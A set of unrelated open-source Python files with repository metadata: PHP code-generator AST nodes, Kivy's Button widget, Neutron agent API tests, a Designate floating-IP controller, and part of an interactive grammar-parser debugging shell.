def __init__(self, id_, terminator, content):
super(Trait, self).__init__(id_, terminator)
self.content = content
def gen(self):
append('trait ')
super(Trait, self).gen()
append(' { ')
self.terminator.gen()
append('\n')
self.content.gen()
append([indentSpaces(), '}'])
class JustStrModifier(BaseNode):
def gen(self):
super(JustStrModifier, self).gen()
self.val and append(' ')
class AbstractModifier(JustStrModifier):
pass
class FinalModifier(JustStrModifier):
pass
class ClassContent(Block):
pass
class InClassDefList(Body):
pass
class InClassDef(BaseNode):
def __init__(self, abstract, val):
self.abstract = abstract
super(InClassDef, self).__init__(val)
def gen(self):
append(indentSpaces())
self.abstract and append([self.abstract, ' '])
super(InClassDef, self).gen()
append('\n')
class UseTrait(WithTerminatorNode):
def __init__(self, use, terminator, content):
super(UseTrait, self).__init__(use, terminator)
self.content = content
def gen(self):
super(UseTrait, self).gen()
if self.content:
append(' { ')
self.terminator.gen()
append('\n')
self.content.gen()
append([indentSpaces(), '}'])
else:
append('; ')
self.terminator.gen()
class UseTraitContent(Block):
pass
class InUseTraitDefList(Body):
pass
class InUseTraitDef(BaseNode):
def __init__(self, var, type_, access, ns, terminator):
super(InUseTraitDef, self).__init__(var)
self.type_ = type_
self.access = access
self.ns = ns
self.terminator = terminator
def gen(self):
append(indentSpaces())
self.val.gen(True)
append([' ', self.type_, ' '])
if self.access:
self.access.gen()
if self.ns:
self.ns.gen()
else:
popStr()
append('; ')
self.terminator.gen()
append('\n')
class Interface(WithTerminatorNode):
def __init__(self, id_, extends, terminator, content):
super(Interface, self).__init__(id_, terminator)
self.extends = extends
self.terminator = terminator
self.content = content
def gen(self):
append(['interface ', self.val])
self.extends.gen()
append(' { ')
self.terminator.gen()
append('\n')
self.content.gen()
append([indentSpaces(), '}'])
class InterfaceContent(Block):
pass
class InterfaceDefList(Body):
pass
class InterfaceDef(Line):
pass
class ExtendsModifier(BaseNode):
def gen(self):
if not self.val:
return
append(' extends ')
super(ExtendsModifier, self).gen()
class ImplementsModifier(BaseNode):
def gen(self):
if not self.val:
return
append(' implements ')
super(ImplementsModifier, self).gen()
class AccessModifier(JustStrModifier):
def gen(self, defaultPublic=False):
if defaultPublic and self.val == None:
self.val = 'public'
super(AccessModifier, self).gen()
class StaticModifier(JustStrModifier):
pass
class RefModifier(BaseNode):
pass
class MemberFuncDecWithoutTerminator(BaseNode):
def __init__(self, final, access, static, ref, id_, paramList):
super(MemberFuncDecWithoutTerminator, self).__init__(id_)
self.final = final
self.access = access
self.static = static
self.ref = ref
self.paramList = paramList
def gen(self):
self.final.gen()
self.access.gen()
self.static.gen()
self.ref.gen()
append('function ')
super(MemberFuncDecWithoutTerminator, self).gen()
append('(')
self.paramList.gen()
append(')')
class MemberFuncDec(WithTerminatorNode):
def __init__(self, func, returnType, terminator):
super(MemberFuncDec, self).__init__(func, terminator)
self.returnType = returnType
def gen(self):
super(MemberFuncDec, self).gen()
self.returnType.gen()
append('; ')
self.terminator.gen()
class ReturnTypeModifierForDec(BaseNode):
def gen(self):
if not self.val:
return
append(': ')
super(ReturnTypeModifierForDec, self).gen()
append(' ')
class MemberFuncDef(WithTerminatorNode):
def __init__(self, val, returnType, terminator, block):
super(MemberFuncDef, self).__init__(val, terminator)
self.block = block
self.returnType = returnType
def gen(self):
super(MemberFuncDef, self).gen()
self.returnType.gen()
append(' { ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '}'])
class DataMemberDef(WithTerminatorNode):
def __init__(self, access, static, ref, id_, init, terminator):
super(DataMemberDef, self).__init__(id_, terminator)
self.access = access
self.static = static
self.init = init
self.ref = ref
def gen(self):
self.access.gen(True)
self.static.gen()
self.ref.gen()
if not self.val.isupper():
append('$')
super(DataMemberDef, self).gen()
self.init.gen()
append('; ')
self.terminator.gen()
class ReturnTypeModifier(BaseNode):
def gen(self):
if self.val:
append(': ')
self.val.gen()
class FuncDef(WithTerminatorNode):
def __init__(self, ref, id_, paramList, returnType, terminator, block):
self.ref = ref
super(FuncDef, self).__init__(id_, terminator)
self.paramList = paramList
self.returnType = returnType
self.block = block
def gen(self):
append('function ')
self.ref.gen()
super(FuncDef, self).gen()
append('(')
self.paramList.gen()
append(')')
self.returnType.gen()
append(' { ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '}'])
class ConstDefWithoutTerminator(BaseNode):
def __init__(self, id_, assignRightSide):
super(ConstDefWithoutTerminator, self).__init__(id_)
self.assignRightSide = assignRightSide
def gen(self):
append('const ')
super(ConstDefWithoutTerminator, self).gen()
self.assignRightSide.gen()
class ConstDef(WithTerminatorNode):
def gen(self):
super(ConstDef, self).gen()
append('; ')
self.terminator.gen()
class Yield(BaseNode):
def __init__(self, exp1, exp2):
super(Yield, self).__init__(exp1)
self.exp2 = exp2
def gen(self):
append('yield')
self.val and append(' ')
super(Yield, self).gen()
if self.exp2:
append(' => ')
self.exp2.gen()
class GlobalDec(BaseNode):
def gen(self):
append('global ')
super(GlobalDec, self).gen()
class GlobalVaribleList(CommaList):
def gen(self):
if self.list_ != None:
self.list_.gen()
append(', ')
# append('$')
super(CommaList, self).gen()
class Operation(BaseNode):
pass
class StrCat(BinaryOperationNode):
pass
class UMath(UnaryOperationNode):
pass
class BMath(BinaryOperationNode):
pass
class Cast(UnaryOperationNode):
pass
class InDecrement(UnaryOperationNode):
def __init__(self, op, exp, back):
super(InDecrement, self).__init__(op, exp)
self.back = back
def gen(self):
if self.back == True:
self.exp.gen()
append(self.val)
else:
super(InDecrement, self).gen()
class UBit(UnaryOperationNode):
pass
class BBit(BinaryOperationNode):
pass
class InstanceOf(BinaryOperationNode):
pass
class ULogic(UnaryOperationNode):
pass
class BLogic(BinaryOperationNode):
pass
class NewOrClone(BaseNode):
def __init__(self, newOrClone, nsContentName, argList, varible):
super(NewOrClone, self).__init__(nsContentName)
self.argList = argList
self.varible = varible
self.newOrClone = newOrClone
def gen(self):
append(self.newOrClone)
append(' ')
if self.argList:
super(NewOrClone, self).gen()
append('(')
self.argList.gen()
append(')')
else:
if isinstance(self.varible, str):
append(self.varible)
else:
self.varible.gen()
class Compare(BinaryOperationNode):
pass
class Ternary(BaseNode):
def __init__(self, exp1, exp2, exp3):
super(Ternary, self).__init__(exp1)
self.exp2 = exp2
self.exp3 = exp3
def gen(self):
super(Ternary, self).gen()
append(' ? ')
self.exp2.gen()
append(' : ')
self.exp3.gen()
class At(UnaryOperationNode):
pass
class Ref(UnaryOperationNode):
pass
|
{
"content_hash": "2f55e769d8b8fe8381c2025e46df91e0",
"timestamp": "",
"source": "github",
"line_count": 1152,
"max_line_length": 87,
"avg_line_length": 22.489583333333332,
"alnum_prop": 0.553960166743863,
"repo_name": "zxylvlp/PingPHP",
"id": "cb25aba9e6142f3b37be94bc933dae340450e527",
"size": "25926",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pingphp/nodes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PHP",
"bytes": "206876"
},
{
"name": "Python",
"bytes": "73496"
},
{
"name": "Shell",
"bytes": "320"
}
],
"symlink_target": ""
}
|
'''
Button
======
.. image:: images/button.jpg
:align: right
The :class:`Button` is a :class:`~kivy.uix.label.Label` with associated actions
that are triggered when the button is pressed (or released after a
click/touch). To configure the button, the same properties (padding,
font_size, etc) and
:ref:`sizing system <kivy-uix-label-sizing-and-text-content>`
are used as for the :class:`~kivy.uix.label.Label` class::
button = Button(text='Hello world', font_size=14)
To attach a callback when the button is pressed (clicked/touched), use
:class:`~kivy.uix.widget.Widget.bind`::
def callback(instance):
print('The button <%s> is being pressed' % instance.text)
btn1 = Button(text='Hello world 1')
btn1.bind(on_press=callback)
btn2 = Button(text='Hello world 2')
btn2.bind(on_press=callback)
If you want to be notified every time the button state changes, you can bind
to the :attr:`Button.state` property::
def callback(instance, value):
print('My button <%s> state is <%s>' % (instance, value))
btn1 = Button(text='Hello world 1')
btn1.bind(state=callback)
Kv Example::
Button:
text: 'press me'
on_press: print("ouch! More gently please")
on_release: print("ahhh")
on_state:
print("my current state is {}".format(self.state))
'''
__all__ = ('Button', )
from kivy.uix.label import Label
from kivy.properties import StringProperty, ListProperty, ColorProperty
from kivy.uix.behaviors import ButtonBehavior
class Button(ButtonBehavior, Label):
'''Button class, see module documentation for more information.
.. versionchanged:: 1.8.0
The behavior / logic of the button has been moved to
:class:`~kivy.uix.behaviors.ButtonBehaviors`.
'''
background_color = ColorProperty([1, 1, 1, 1])
'''Background color, in the format (r, g, b, a).
This acts as a *multiplier* to the texture colour. The default
texture is grey, so just setting the background color will give
a darker result. To set a plain color, set the
:attr:`background_normal` to ``''``.
.. versionadded:: 1.0.8
The :attr:`background_color` is a
:class:`~kivy.properties.ColorProperty` and defaults to [1, 1, 1, 1].
.. versionchanged:: 2.0.0
Changed from :class:`~kivy.properties.ListProperty` to
:class:`~kivy.properties.ColorProperty`.
'''
background_normal = StringProperty(
'atlas://data/images/defaulttheme/button')
'''Background image of the button used for the default graphical
representation when the button is not pressed.
.. versionadded:: 1.0.4
:attr:`background_normal` is a :class:`~kivy.properties.StringProperty`
and defaults to 'atlas://data/images/defaulttheme/button'.
'''
background_down = StringProperty(
'atlas://data/images/defaulttheme/button_pressed')
'''Background image of the button used for the default graphical
representation when the button is pressed.
.. versionadded:: 1.0.4
:attr:`background_down` is a :class:`~kivy.properties.StringProperty` and
defaults to 'atlas://data/images/defaulttheme/button_pressed'.
'''
background_disabled_normal = StringProperty(
'atlas://data/images/defaulttheme/button_disabled')
'''Background image of the button used for the default graphical
representation when the button is disabled and not pressed.
.. versionadded:: 1.8.0
:attr:`background_disabled_normal` is a
:class:`~kivy.properties.StringProperty` and defaults to
'atlas://data/images/defaulttheme/button_disabled'.
'''
background_disabled_down = StringProperty(
'atlas://data/images/defaulttheme/button_disabled_pressed')
'''Background image of the button used for the default graphical
representation when the button is disabled and pressed.
.. versionadded:: 1.8.0
:attr:`background_disabled_down` is a
:class:`~kivy.properties.StringProperty` and defaults to
'atlas://data/images/defaulttheme/button_disabled_pressed'.
'''
border = ListProperty([16, 16, 16, 16])
'''Border used for :class:`~kivy.graphics.vertex_instructions.BorderImage`
graphics instruction. Used with :attr:`background_normal` and
:attr:`background_down`. Can be used for custom backgrounds.
It must be a list of four values: (bottom, right, top, left). Read the
BorderImage instruction for more information about how to use it.
:attr:`border` is a :class:`~kivy.properties.ListProperty` and defaults to
(16, 16, 16, 16)
'''
|
{
"content_hash": "bd46ca99dec3d55156f961e96a7ab073",
"timestamp": "",
"source": "github",
"line_count": 137,
"max_line_length": 79,
"avg_line_length": 33.56204379562044,
"alnum_prop": 0.6846454980426272,
"repo_name": "matham/kivy",
"id": "96123c668bb00c8031acc1744355814a3989f2e1",
"size": "4598",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "kivy/uix/button.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "324418"
},
{
"name": "C++",
"bytes": "3888"
},
{
"name": "Emacs Lisp",
"bytes": "9838"
},
{
"name": "GLSL",
"bytes": "323"
},
{
"name": "Makefile",
"bytes": "4993"
},
{
"name": "Objective-C",
"bytes": "21550"
},
{
"name": "PowerShell",
"bytes": "5375"
},
{
"name": "Python",
"bytes": "4204346"
},
{
"name": "Shell",
"bytes": "25365"
},
{
"name": "Vim script",
"bytes": "2120"
}
],
"symlink_target": ""
}
|
class Serie():
"""Model of a TV serie."""
pass
|
{
"content_hash": "a24c8c370b368b8306694fef20e3cb75",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 30,
"avg_line_length": 18.333333333333332,
"alnum_prop": 0.5272727272727272,
"repo_name": "Rolinh/pydeo",
"id": "ed00f28b2e827409361ecd78c07eb094f063a7cd",
"size": "55",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pydeo/app/models/serie.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "937"
},
{
"name": "JavaScript",
"bytes": "5506"
},
{
"name": "Python",
"bytes": "37158"
}
],
"symlink_target": ""
}
|
import copy
import time
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import timeutils
from webob import exc
from neutron.api.v2 import attributes
from neutron.common import constants
from neutron import context
from neutron.db import agents_db
from neutron.db import db_base_plugin_v2
from neutron.extensions import agent
from neutron.openstack.common import uuidutils
from neutron.tests.common import helpers
from neutron.tests import tools
from neutron.tests.unit.api.v2 import test_base
from neutron.tests.unit.db import test_db_base_plugin_v2
LOG = logging.getLogger(__name__)
_uuid = uuidutils.generate_uuid
_get_path = test_base._get_path
L3_HOSTA = 'hosta'
DHCP_HOSTA = 'hosta'
L3_HOSTB = 'hostb'
DHCP_HOSTC = 'hostc'
LBAAS_HOSTA = 'hosta'
LBAAS_HOSTB = 'hostb'
class AgentTestExtensionManager(object):
def get_resources(self):
# Add the resources to the global attribute map
# This is done here as the setup process won't
# initialize the main API router which extends
# the global attribute map
attributes.RESOURCE_ATTRIBUTE_MAP.update(
agent.RESOURCE_ATTRIBUTE_MAP)
return agent.Agent.get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
# This plugin class is just for testing
class TestAgentPlugin(db_base_plugin_v2.NeutronDbPluginV2,
agents_db.AgentDbMixin):
supported_extension_aliases = ["agent"]
class AgentDBTestMixIn(object):
def _list_agents(self, expected_res_status=None,
neutron_context=None,
query_string=None):
agent_res = self._list('agents',
neutron_context=neutron_context,
query_params=query_string)
if expected_res_status:
self.assertEqual(agent_res.status_int, expected_res_status)
return agent_res
def _register_agent_states(self, lbaas_agents=False):
"""Register two L3 agents and two DHCP agents."""
l3_hosta = helpers._get_l3_agent_dict(
L3_HOSTA, constants.L3_AGENT_MODE_LEGACY)
l3_hostb = helpers._get_l3_agent_dict(
L3_HOSTB, constants.L3_AGENT_MODE_LEGACY)
dhcp_hosta = helpers._get_dhcp_agent_dict(DHCP_HOSTA)
dhcp_hostc = helpers._get_dhcp_agent_dict(DHCP_HOSTC)
helpers.register_l3_agent(host=L3_HOSTA)
helpers.register_l3_agent(host=L3_HOSTB)
helpers.register_dhcp_agent(host=DHCP_HOSTA)
helpers.register_dhcp_agent(host=DHCP_HOSTC)
res = [l3_hosta, l3_hostb, dhcp_hosta, dhcp_hostc]
if lbaas_agents:
lbaas_hosta = {
'binary': 'neutron-loadbalancer-agent',
'host': LBAAS_HOSTA,
'topic': 'LOADBALANCER_AGENT',
'configurations': {'device_drivers': ['haproxy_ns']},
'agent_type': constants.AGENT_TYPE_LOADBALANCER}
lbaas_hostb = copy.deepcopy(lbaas_hosta)
lbaas_hostb['host'] = LBAAS_HOSTB
callback = agents_db.AgentExtRpcCallback()
callback.report_state(self.adminContext,
agent_state={'agent_state': lbaas_hosta},
time=timeutils.strtime())
callback.report_state(self.adminContext,
agent_state={'agent_state': lbaas_hostb},
time=timeutils.strtime())
res += [lbaas_hosta, lbaas_hostb]
return res
class AgentDBTestCase(AgentDBTestMixIn,
test_db_base_plugin_v2.NeutronDbPluginV2TestCase):
fmt = 'json'
def setUp(self):
plugin = 'neutron.tests.unit.extensions.test_agent.TestAgentPlugin'
# for these tests we need to enable overlapping ips
cfg.CONF.set_default('allow_overlapping_ips', True)
self.useFixture(tools.AttributeMapMemento())
ext_mgr = AgentTestExtensionManager()
super(AgentDBTestCase, self).setUp(plugin=plugin, ext_mgr=ext_mgr)
self.adminContext = context.get_admin_context()
def test_create_agent(self):
data = {'agent': {}}
_req = self.new_create_request('agents', data, self.fmt)
_req.environ['neutron.context'] = context.Context(
'', 'tenant_id')
res = _req.get_response(self.ext_api)
self.assertEqual(res.status_int, exc.HTTPBadRequest.code)
def test_list_agent(self):
agents = self._register_agent_states()
res = self._list('agents')
self.assertEqual(len(agents), len(res['agents']))
def test_show_agent(self):
self._register_agent_states()
agents = self._list_agents(
query_string='binary=neutron-l3-agent')
self.assertEqual(2, len(agents['agents']))
agent = self._show('agents', agents['agents'][0]['id'])
self.assertEqual('neutron-l3-agent', agent['agent']['binary'])
def test_update_agent(self):
self._register_agent_states()
agents = self._list_agents(
query_string='binary=neutron-l3-agent&host=' + L3_HOSTB)
self.assertEqual(1, len(agents['agents']))
com_id = agents['agents'][0]['id']
agent = self._show('agents', com_id)
new_agent = {}
new_agent['agent'] = {}
new_agent['agent']['admin_state_up'] = False
new_agent['agent']['description'] = 'description'
self._update('agents', com_id, new_agent)
agent = self._show('agents', com_id)
self.assertFalse(agent['agent']['admin_state_up'])
self.assertEqual('description', agent['agent']['description'])
def test_dead_agent(self):
cfg.CONF.set_override('agent_down_time', 1)
self._register_agent_states()
time.sleep(1.5)
agents = self._list_agents(
query_string='binary=neutron-l3-agent&host=' + L3_HOSTB)
self.assertFalse(agents['agents'][0]['alive'])
|
{
"content_hash": "b917ef8012cf508688d28b118630494f",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 75,
"avg_line_length": 37.559006211180126,
"alnum_prop": 0.6194807342483877,
"repo_name": "NeCTAR-RC/neutron",
"id": "abc28b9aaf45dd2c81ca03b46bc4050434e5f314",
"size": "6688",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "neutron/tests/unit/extensions/test_agent.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "980"
},
{
"name": "Python",
"bytes": "7228162"
},
{
"name": "Shell",
"bytes": "12807"
}
],
"symlink_target": ""
}
|
import pecan
import re
from designate import exceptions
from designate import schema
from designate.api.v2.controllers import rest
from designate.api.v2.views import floatingips as floatingips_views
from designate.central import rpcapi as central_rpcapi
central_api = central_rpcapi.CentralAPI()
FIP_REGEX = '^(?P<region>[A-Za-z0-9\\.\\-_]{1,100}):' \
'(?P<id>[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-' \
'[0-9a-fA-F]{4}-[0-9a-fA-F]{12})$'
def fip_key_to_data(key):
m = re.match(FIP_REGEX, key)
# NOTE: Ensure that the fip matches region:floatingip_id or raise, if
# not this will cause a 500.
if m is None:
msg = 'Floating IP %s is not in the format of <region>:<uuid>'
raise exceptions.BadRequest(msg % key)
return m.groups()
class FloatingIPController(rest.RestController):
_view = floatingips_views.FloatingIPView()
_resource_schema = schema.Schema('v2', 'floatingip')
_collection_schema = schema.Schema('v2', 'floatingips')
@pecan.expose(template='json:', content_type='application/json')
def get_all(self, **params):
""" List Floating IP PTRs for a Tenant """
request = pecan.request
context = request.environ['context']
fips = central_api.list_floatingips(context)
return self._view.list(context, request, fips)
@pecan.expose(template='json:', content_type='application/json')
def patch_one(self, fip_key):
"""
Set or unset a PTR
"""
request = pecan.request
context = request.environ['context']
body = request.body_dict
region, id_ = fip_key_to_data(fip_key)
# Validate the request conforms to the schema
self._resource_schema.validate(body)
fip = central_api.update_floatingip(
context, region, id_, body['floatingip'])
if fip:
return self._view.show(context, request, fip)
@pecan.expose(template='json:', content_type='application/json')
def get_one(self, fip_key):
"""
Get PTR
"""
request = pecan.request
context = request.environ['context']
region, id_ = fip_key_to_data(fip_key)
fip = central_api.get_floatingip(context, region, id_)
return self._view.show(context, request, fip)
|
{
"content_hash": "92c29caa22f3f940148a60f9caeb19be",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 73,
"avg_line_length": 31.04,
"alnum_prop": 0.625,
"repo_name": "NeCTAR-RC/designate",
"id": "ae373b7f140a7adc9da66143b758c54f56401044",
"size": "2983",
"binary": false,
"copies": "1",
"ref": "refs/heads/nectar/icehouse",
"path": "designate/api/v2/controllers/floatingips.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1402878"
},
{
"name": "Shell",
"bytes": "3809"
}
],
"symlink_target": ""
}
|
import cmd
import os
import sys
import time
import traceback
from typing import Optional, List, Iterator, Tuple, Dict
from pyramids.categorization import Category
from pyramids.model import Model
from pyramids.rules.parse_rule import ParseRule
try:
from graphviz import Digraph
except ImportError:
Digraph = None
from pyramids.grammar import GrammarParser
from pyramids.trees import Parse, TreeNodeSet, ParseTreeUtils
try:
# noinspection PyPep8Naming
import cProfile as profile
except ImportError:
import profile
from pyramids.batching import Attempt, Result, ModelBatchController, FeedbackReceiver, Failure
from pyramids.config import ModelConfig
from pyramids.loader import ModelLoader
from pyramids.parsing import ParsingAlgorithm
from pyramids.generation import GenerationAlgorithm
from pyramids.sample_utils import Input, Target, SampleSet, SampleUtils
__author__ = 'Aaron Hosford'
__all__ = [
'ParserCmd',
'repl',
]
function_to_profile = None
class ParserCmd(cmd.Cmd):
def __init__(self, model_loader: ModelLoader):
cmd.Cmd.__init__(self)
self._model_loader = model_loader
self._model = model_loader.load_model()
self.prompt = '% '
self._simple = True
self._show_broken = False
self._parser_state = None
self._parses = [] # type: List[Parse]
self._whole_parses = 0
self._parse_index = 0
self._fast = False
self._timeout_interval = 5
self._emergency_mode = False
self._benchmark_path = None
self._benchmark: Optional[SampleSet] = None
self._benchmark_dirty = False
self._benchmark_emergency_disambiguations = 0
self._benchmark_parse_timeouts = 0
self._benchmark_disambiguation_timeouts = 0
self._benchmark_time = 0.0
self._benchmark_tests_completed = 0
self._benchmark_update_time = time.time()
self._last_input_text = None
self.do_load()
@property
def model(self) -> Model:
return self._model
@property
def model_loader(self) -> ModelLoader:
return self._model_loader
@property
def max_parse_index(self) -> int:
if self._show_broken:
return len(self._parses) - 1 if self._parses else 0
return self._whole_parses - 1 if self._whole_parses else 0
@property
def parses_available(self) -> bool:
return bool(self._parser_state if self._show_broken else self._whole_parses)
@property
def last_input_text(self) -> Optional[str]:
return self._last_input_text
def onecmd(self, line: str) -> Optional[bool]:
# noinspection PyBroadException
try:
return cmd.Cmd.onecmd(self, line)
except Exception:
traceback.print_exc()
def precmd(self, line: str) -> str:
# Pre-processes command lines before they are executed.
line = line.strip()
if not line:
return line
command = line.split()[0]
if command == '+':
return 'good' + line[1:]
if command == '-':
return 'bad' + line[1:]
if command == '++':
return 'best' + line[2:]
if command == '--':
return 'worst' + line[2:]
return line
def postcmd(self, stop: Optional[bool], line: str) -> Optional[bool]:
# Post-processes command results before they are passed back to the
# command interpreter.
print('') # Print a blank line for clarity
return stop
def emptyline(self) -> Optional[bool]:
# Called when the user just hits enter with no input.
return self.do_next()
def default(self, line: str) -> Optional[bool]:
# Called when the command is unrecognized. By default, we assume
# it's a parse request.
return self.do_parse(line)
@staticmethod
def do_shell(line: str) -> None:
# Called when the command starts with "!".
try:
print(eval(line))
except SyntaxError:
exec(line)
def do_quit(self, line: str) -> Optional[bool]:
"""Save scoring features and exit the parser debugger."""
if line:
print("'quit' command does not accept arguments.")
return
self.do_save() # Save what we're doing first.
return True # Indicate we're ready to stop.
def do_exit(self, line: str) -> Optional[bool]:
"""Alias for quit."""
if line:
print("'exit' command does not accept arguments.")
return
return self.do_quit(line)
def do_bye(self, line: str) -> Optional[bool]:
"""Alias for quit."""
if line:
print("'bye' command does not accept arguments.")
return
return self.do_quit(line)
def do_done(self, line: str) -> Optional[bool]:
"""Alias for quit."""
if line:
print("'done' command does not accept arguments.")
return
return self.do_quit(line)
@staticmethod
def do_cls(_line: str) -> None:
"""Clears the screen."""
if sys.platform == 'nt':
os.system('cls')
else:
os.system('clear')
@staticmethod
def do_clear(_line: str) -> None:
"""Clears the screen."""
if sys.platform == 'nt':
os.system('cls')
else:
os.system('clear')
def do_standardize(self, line: str) -> None:
"""Standardizes the parser's files."""
if not line:
if self._model and self._model.config_info:
config_info = self._model.config_info
else:
config_info = self._model_loader.load_model_config()
else:
config_info = ModelConfig(line)
self._model_loader.standardize_model(config_info)
def do_short(self, line: str) -> None:
"""Causes parses to be printed in short form instead of long form."""
if line:
print("'short' command does not accept arguments.")
return
self._simple = True
print("Parses will now be printed in short form.")
def do_broken(self, line: str) -> None:
"""Causes parses that have more pieces or gaps than necessary to be
listed."""
if line:
print("'broken' command does not accept arguments.")
return
self._show_broken = True
print("Parses with more pieces or gaps than necessary will now be listed.")
def do_whole(self, line: str) -> None:
"""Causes only parses that have no more pieces or gaps than necessary to be listed."""
if line:
print("'whole' command does not accept arguments.")
return
self._show_broken = False
self._parse_index = min(self._parse_index, self.max_parse_index)
print("Only parses with no more pieces or gaps than necessary will now be listed.")
def do_long(self, line: str) -> None:
"""Causes parses to be printed in long form instead of short form."""
if line:
print("'long' command does not accept arguments.")
return
self._simple = False
print("Parses will now be printed in long form.")
def do_fast(self, line: str) -> None:
"""Causes parsing to stop as soon as a single parse is found."""
if line:
print("'fast' command does not accept arguments.")
return
self._fast = True
print("Parsing will now stop as soon as a single parse is found.")
def do_complete(self, line: str) -> None:
"""Causes parsing to continue until all parses have been identified."""
if line:
print("'complete' command does not accept arguments.")
return
self._fast = False
print("Parsing will now continue until all parses have been identified.")
def do_load(self, line: str = '') -> None:
"""Save scoring features and load a parser from the given configuration file."""
self.do_save()
if not line:
line = self._model.config_info.config_file_path
if not os.path.isfile(line):
print("File not found: " + line)
return
config_info = ModelConfig(line)
self._model = self._model_loader.load_model(config_info)
self._parser_state = None
self._benchmark = (SampleUtils.load(config_info.benchmark_file)
if os.path.isfile(config_info.benchmark_file)
else None)
self._benchmark_dirty = False
def do_reload(self, line: str = '') -> None:
"""Save scoring features and reload the last configuration file provided."""
if line:
print("'reload' command does not accept arguments.")
return
self.do_save()
self.do_load(self._model.config_info.config_file_path
if self._model and self._model.config_info
else '')
def do_save(self, line: str = '') -> None:
"""Save scoring features."""
if line:
print("'save' command does not accept arguments.")
return
if self._model is not None:
self._model_loader.save_scoring_features(self._model)
if self._benchmark_dirty:
SampleUtils.save(self._benchmark, self._model.config_info.benchmark_file)
self._benchmark_dirty = False
def do_discard(self, line: str = '') -> None:
"""Discard scoring features."""
if line:
print("'discard' command does not accept arguments.")
return
self._model_loader.load_scoring_features(self._model)
config_info = self._model.config_info
if os.path.isfile(config_info.benchmark_file):
self._benchmark = SampleUtils.load(config_info.benchmark_file)
else:
self._benchmark = None
self._benchmark_dirty = False
@staticmethod
def do_compare(line: str) -> None:
"""Compare two categories to determine if either contains the other."""
definitions = [definition for definition in line.split() if definition]
if len(definitions) == 0:
print("Nothing to compare.")
return
if len(definitions) == 1:
print("Nothing to compare with.")
return
categories = set()
for definition in definitions:
categories.add(GrammarParser.parse_category(definition,
offset=line.find(definition) + 1))
categories = sorted(categories, key=str)
for category1 in categories:
for category2 in categories:
if category1 is not category2:
contains_phrase = [" does not contain ", " contains "][category2 in category1]
print(str(category1) + contains_phrase + str(category2))
def do_timeout(self, line: str) -> None:
"""Set (or display) the timeout duration for parsing."""
if not line:
print("Parsing timeout duration is currently " + str(self._timeout_interval) +
" seconds")
return
try:
try:
# Only bother with this because an integer looks prettier
# when printed.
self._timeout_interval = int(line)
except ValueError:
self._timeout_interval = float(line)
except ValueError:
print("Timeout duration could not be set to this value.")
else:
print("Set parsing timeout duration to " + str(self._timeout_interval) + " seconds.")
def _do_parse(self, line: str, timeout: float, new_parser_state: bool = True,
restriction_category: Category = None, fast: bool = None,
emergency: bool = False) -> Tuple[bool, bool, bool]:
if fast is None:
fast = self._fast
if new_parser_state or self._parser_state is None:
self._parser_state = ParsingAlgorithm.new_parser_state(self._model)
parse = ParsingAlgorithm.parse(self._parser_state, line, fast, timeout, emergency)
parse_timed_out = time.time() >= timeout
emergency_disambiguation = False
if restriction_category:
parse = parse.restrict(restriction_category)
self._parses = [disambiguation
for (disambiguation, rank)
in parse.get_sorted_disambiguations(None, None, timeout)]
if not self._parses:
emergency_disambiguation = True
self._parses = [parse.disambiguate()]
disambiguation_timed_out = time.time() >= timeout
self._whole_parses = len([disambiguation
for disambiguation in self._parses
if ((len(disambiguation.parse_trees)
== len(self._parses[0].parse_trees)) and
(disambiguation.total_gap_size()
== self._parses[0].total_gap_size()))])
self._parse_index = 0
self._last_input_text = line
return emergency_disambiguation, parse_timed_out, disambiguation_timed_out
def _handle_parse(self, line: str, new_parser_state: bool = True,
restriction_category: Category = None, fast: bool = None,
emergency: bool = False) -> None:
"""Handle parsing on behalf of do_parse, do_as, and do_extend."""
if not line:
print("Nothing to parse.")
return
start_time = time.time()
timeout = start_time + self._timeout_interval
emergency_disambig, parse_timed_out, disambig_timed_out = \
self._do_parse(line, timeout, new_parser_state, restriction_category, fast, emergency)
end_time = time.time()
print('')
if parse_timed_out:
print("*** Parse timed out. ***")
if disambig_timed_out:
print("*** Disambiguation timed out. ***")
if emergency_disambig:
print("*** Using emergency (non-optimal) disambiguation. ***")
print('')
print("Total parse time: " + str(
round(end_time - start_time, 3)) + " seconds")
print("Total number of parses: " + str(len(self._parses)))
print("Total number of whole parses: " + str(self._whole_parses))
print('')
self.do_current()
def do_parse(self, line: str) -> None:
"""Parse an input string and print the highest-scoring parse for it."""
self._handle_parse(line, emergency=self._emergency_mode)
def do_as(self, line: str) -> None:
"""Parse an input string as a particular category and print the
highest-scoring parse for it."""
if not line:
print("No category specified.")
return
category_definition = line.split()[0]
category = GrammarParser.parse_category(category_definition)
line = line[len(category_definition):].strip()
self._handle_parse(line, restriction_category=category, emergency=self._emergency_mode)
def do_extend(self, line: str) -> None:
"""Extend the previous input string with additional text and print the
highest-scoring parse for the combined input strings."""
self._handle_parse(line, new_parser_state=False, emergency=self._emergency_mode)
def do_files(self, line: str) -> None:
"""List the word list files containing a given word."""
if not line:
print("No word specified.")
return
if len(line.split()) > 1:
print("Expected only one word.")
return
word = line.strip()
config_info = (self._model.config_info
if self._model and self._model.config_info
else self._model_loader.load_model_config())
found = False
for folder_path in config_info.word_sets_folders:
for filename in os.listdir(folder_path):
if not filename.lower().endswith('.ctg'):
continue
file_path = os.path.join(folder_path, filename)
with open(file_path) as word_set_file:
words = set(word_set_file.read().split())
if word in words:
print(repr(word) + " found in " + file_path + ".")
found = True
if not found:
print(repr(word) + " not found in any word list files.")
